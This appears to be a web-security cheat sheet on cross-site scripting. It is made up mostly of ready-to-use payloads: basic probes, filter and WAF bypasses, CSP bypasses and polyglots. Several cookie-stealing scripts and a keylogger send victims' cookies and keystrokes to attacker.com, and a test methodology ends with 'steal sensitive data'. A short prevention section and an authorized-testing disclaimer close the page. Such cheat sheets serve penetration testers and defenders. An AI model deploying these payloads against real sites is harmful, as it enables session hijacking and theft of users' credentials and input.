๐ŸŒ Web Vulnerabilities

XSS (Cross-Site Scripting) Cheat Sheet

๐ŸŽฏ Quick Reference

What is XSS?

XSS allows attackers to inject malicious scripts into web pages viewed by other users, potentially stealing cookies, session tokens, or performing actions on behalf of the victim.

Types of XSS

TypeDescriptionPersistenceDetection
ReflectedPayload in URL/request, reflected immediatelyNoCheck URL parameters
StoredPayload stored in database, executed on page loadYesCheck input fields, comments
DOM-basedPayload manipulates DOM client-sideNoCheck JavaScript, URL fragments

๐Ÿ”ฅ Essential Payloads

Basic XSS Probes

html
1<!-- Simple alert -->
2<script>alert('XSS')</script>
3<script>alert(1)</script>
4<script>alert(document.domain)</script>
5
6<!-- Event handlers -->
7<img src=x onerror=alert(1)>
8<svg onload=alert(1)>
9<body onload=alert(1)>
10<input onfocus=alert(1) autofocus>
11<select onfocus=alert(1) autofocus>
12<textarea onfocus=alert(1) autofocus>
13<iframe onload=alert(1)>
14
15<!-- Without parentheses -->
16<script>alert`1`</script>
17<script>alert(document.domain)</script>
18
19<!-- Polyglot -->
20javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
javascript
1// Steal cookies and send to attacker server
2<script>
3fetch('https://attacker.com/steal?cookie=' + document.cookie);
4</script>
5
6// Using image tag
7<img src=x onerror=this.src='https://attacker.com/steal?cookie='+document.cookie>
8
9// Using XMLHttpRequest
10<script>
11var xhr = new XMLHttpRequest();
12xhr.open('GET', 'https://attacker.com/steal?cookie=' + document.cookie);
13xhr.send();
14</script>

Keylogger Payload

javascript
<script>
document.addEventListener('keypress', function(e) {
    fetch('https://attacker.com/log?key=' + e.key);
});
</script>

๐Ÿ›ก๏ธ WAF Bypass Techniques

Case Manipulation

html
<ScRiPt>alert(1)</ScRiPt>
<sCrIpT>alert(1)</sCrIpT>

Character Encoding

html
1<!-- HTML Entity Encoding -->
2&#60;script&#62;alert(1)&#60;/script&#62;
3&lt;script&gt;alert(1)&lt;/script&gt;
4
5<!-- URL Encoding -->
6%3Cscript%3Ealert(1)%3C/script%3E
7
8<!-- Unicode -->
9\u003cscript\u003ealert(1)\u003c/script\u003e
10
11<!-- Hex Encoding -->
12<script>eval('\x61\x6c\x65\x72\x74\x28\x31\x29')</script>
13
14<!-- Octal -->
15<script>eval('\141\154\145\162\164\50\61\51')</script>

Comment Tricks

html
<script>al/*comment*/ert(1)</script>
<script>a//comment%0Alert(1)</script>

String Concatenation

javascript
<script>eval('ale'+'rt(1)')</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<script>Function('ale'+'rt(1)')()</script>

Tag Breaking

html
<img src='x' onerror='alert(1)' <
<svg/onload=alert(1)//
"><script>alert(1)</script>
'><script>alert(1)</script>

๐ŸŽจ CSP Bypass

JSONP Endpoints

html
<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script>

Base Tag Injection

html
<base href="https://attacker.com/">

Angular Template Injection

javascript
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}

Script Gadgets

html
<script src="https://vulnerable-site.com/path?callback=alert"></script>

๐Ÿ“ Real-World Examples

Example 1: Search Box XSS

Scenario: Search parameter reflected in page URL: https://target.com/search?q=<payload> Test: 1. https://target.com/search?q=<script>alert(1)</script> 2. https://target.com/search?q=<img src=x onerror=alert(1)> 3. https://target.com/search?q="><script>alert(1)</script> If escaped, try: https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E

Example 2: Stored XSS in Comment

html
1Scenario: User comments stored in database
2
3Payload in comment field:
4<script>
5fetch('https://attacker.com/steal?cookie=' + document.cookie);
6</script>
7
8Or event handler:
9<img src=x onerror="fetch('https://attacker.com/c=' + document.cookie)">

Example 3: DOM XSS via Hash

javascript
Scenario: Page uses location.hash unsafely
JavaScript: document.getElementById('output').innerHTML = location.hash.slice(1);

Exploit URL:
https://target.com/page#<img src=x onerror=alert(1)>

๐Ÿงช Testing Methodology

Step 1: Identify Input Points

  • URL parameters
  • Form fields
  • HTTP headers
  • File uploads (filename, metadata)
  • Cookie values

Step 2: Test Basic Payloads

html
<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><script>alert(1)</script>
'><script>alert(1)</script>

Step 3: Check Context

  • HTML Context: <script>alert(1)</script>
  • Attribute Context: " onload=alert(1) x="
  • JavaScript Context: ';alert(1);//
  • URL Context: javascript:alert(1)

Step 4: Test Filters

  • Character encoding
  • Tag variations
  • Event handler variations
  • Protocol handlers

Step 5: Craft Final Exploit

  • Bypass detected filters
  • Steal sensitive data
  • Create proof of concept

๐Ÿ” Detection Checklist

  • Test all input fields with basic XSS payloads
  • Check URL parameters and fragments
  • Test HTTP headers (User-Agent, Referer, etc.)
  • Check file upload metadata
  • Test stored vs. reflected context
  • Identify JavaScript sinks (innerHTML, eval, etc.)
  • Check for DOM-based XSS
  • Test CSP bypass if present
  • Verify impact (cookie theft, actions, etc.)

๐Ÿ›ก๏ธ Prevention

Output Encoding

javascript
1// Encode for HTML context
2function encodeHTML(str) {
3    return str.replace(/[&<>"']/g, (char) => ({
4        '&': '&amp;',
5        '<': '&lt;',
6        '>': '&gt;',
7        '"': '&quot;',
8        "'": '&#x27;'
9    }[char]));
10}
11
12// Use in templates
13<div>${encodeHTML(userInput)}</div>

Content Security Policy

http
Content-Security-Policy: default-src 'self'; script-src 'self'

HTTPOnly Cookies

http
Set-Cookie: sessionid=abc123; HttpOnly; Secure; SameSite=Strict

Safe Sinks

javascript
1// Avoid dangerous sinks
2element.innerHTML = userInput; // โŒ Dangerous
3
4// Use safe alternatives
5element.textContent = userInput; // โœ… Safe
6element.setAttribute('data-value', userInput); // โœ… Safe

๐Ÿ”— Quick Commands

Burp Suite Intruder

Position: ยง<script>alert(1)</script>ยง Payload: XSS payloads list Grep: <script>, onerror, onload

Browser Console Testing

javascript
// Test inline
document.body.innerHTML += '<img src=x onerror=alert(1)>';

// Test DOM XSS
location.hash = '<img src=x onerror=alert(1)>';

๐Ÿ“š Tools

  • XSStrike: Automated XSS detection
  • Dalfox: Fast XSS scanner
  • XSSer: XSS exploitation tool
  • Burp Suite: Manual testing
  • OWASP ZAP: Automated scanning

๐Ÿ’ก Pro Tips

  1. Always URL encode payloads when testing in URLs
  2. Test different contexts: HTML, attribute, JavaScript, URL
  3. Check for DOM sinks: innerHTML, eval, document.write
  4. Bypass CSP with JSONP or script gadgets
  5. Use polyglots for multi-context exploitation
  6. Chain with other bugs: CSRF + XSS = Account takeover
  7. Test file uploads: SVG files can contain XSS
  8. Check mobile apps: WebViews often vulnerable

Only test XSS on:

  • โœ… Your own applications
  • โœ… Bug bounty programs (in scope)
  • โœ… Practice labs (DVWA, Juice Shop)
  • โŒ Never on unauthorized targets

Created for educational purposes only. Use responsibly!